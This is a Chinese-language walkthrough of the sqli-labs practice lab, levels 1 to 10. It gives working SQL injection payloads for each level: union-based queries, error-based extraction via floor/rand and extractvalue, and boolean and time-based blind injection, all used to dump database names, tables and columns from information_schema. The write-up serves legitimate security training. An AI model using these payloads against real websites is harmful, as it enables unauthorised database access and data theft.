Sqli-labs-less1-less10

Less-1

提示使用id作为参数传入

不同的ID返回了不同的信息，可以判断传入的ID值可能参与了数据库的查询

接着判断ID是否进行了拼接，且是字符型还是数字型

可以判断存在字符型SQL注入漏洞,且存在回显,可以使用联合查询。

首先，判断该表存在多少列

?id=1' order by 3 --+

order by 4 --+ 时报错，可以判断该表总共3列,接着尝试爆出显示位

?id=-1' union select 1,2,3 --+

2,3是会显示在页面中的

查询当前使用数据库和数据库版本

select database();
select version();
?id= -1' union select 1,database(),version() --+

查询库名、表名、列名

#获取所有数据库名和表名 
?id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(TABLE_NAME) from information_schema.tables) --+

#获取所有列名
?id=-1' union select 1,(select group_concat(COLUMN_NAME) from information_schema.columns),3--+

Less-2

使用’进行尝试，发现报错信息只有’,判断为数字型注入。

?id=1 order by 4
#判断列数

?id=-1 union select 1,2,3
#判度哪个字段回显

?id=-1 union select 1,database(),version()
查询当前使用数据库名和数据库版本 

?id=-1 union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(TABLE_NAME) from information_schema.tables)
获取所有数据库名和表名

http://192.168.154.139/Less-2/?id=-1%20union%20select%201,(select%20group_concat(COLUMN_NAME)%20from%20information_schema.columns),3
获取所有列名

Less-3

使用’进行测试，发现报错信息时’‘),判断是字符型注入,使用’)进行闭合

?id=1') order by 4--+
#判断列数

?id=-1') union select 1,2,3--+
判断哪个字段回显

?id=-1') union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables) --+
获取所有库名和表名

?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns),3--+
获取所有的列名

Less-4

使用"进行测试,发现报错位置时"“),判断是字符型注入,闭合符号时”)

?id=1") order by 4--+
#判断列数

?id=-1") union select 1,2,3--+
#判断哪个字段回显

?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables)--+
#查询所有数据库名和表名

?id=-1") union select 1,(select group_concat(column_name) from information_schema.columns),3--+
 #查询所有列名 

Less-5

使用'进行尝试，发现报错信息,判断是字符型注入，闭合符号是'，接着尝试使用联合注入。 只有报错信息可以显示,可以使用报错注入带出数据。

#获取数据库版本
?id=1' and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- +
#获取数据库名
?id=1' and (select 1 from (select count(*),concat((select group_concat(schema_name) from information_schema.schemata),floor(rand(0)*2))x from information_schema.tables group by x)a)-- +
#获取表名
?id=1' and (select 1 from (select count(*),concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- +
#获取字段名
?id=1' and (select 1 from (select count(*),concat((select column_name from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- +

Less-6

使用"进行尝试,发现报错信息,判断是字符型注入,闭合符号是",使用联合注入无法回显，使用报错注入带出数据。

#获取数据库名
?id=1" and extractvalue(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e)) -- +
#获取表名
?id=1" and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables limit 0,1),0x7e)) -- +
#获取列名
?id=1" and extractvalue(1,concat(0x7e,(select column from information_schema.columns limit 0,1),0x7e)) -- +

Less-7

使用?id=1')) -- +进行测试,发现没有报错提示，判断是字符型注入，闭合符号是')),使用报错注入和联合注入都无法回显,使用布尔盲注带出数据。

#获取数据库长度 
?id=1%27))%20and%20length(database())=8--+
#获取字符串内容
?id=1')) and ascii(substr(database(),1,1))=ascii('s') --+

详细语句可以参考: https://www.dongling.xyz/2024/01/19/sql-injection-boolean-blinds/

Less-8

使用?id=1' -- +进行测试,发现能够正常显示信息，判定是字符型注入，闭合符号是'，报错注入和联合注入都无法回显，使用布尔盲注带出数据。 如何注入带出数据参考less-7

Less-9

使用',",'),")等进行尝试都显示相同的信息,这里我们使用时间盲注进行尝试’ and sleep(5) --+

#判断数据库长度
?id=1' and if(length(database())>=8,sleep(10),1)-- +

Less-10

与less-9类似,闭合符号为",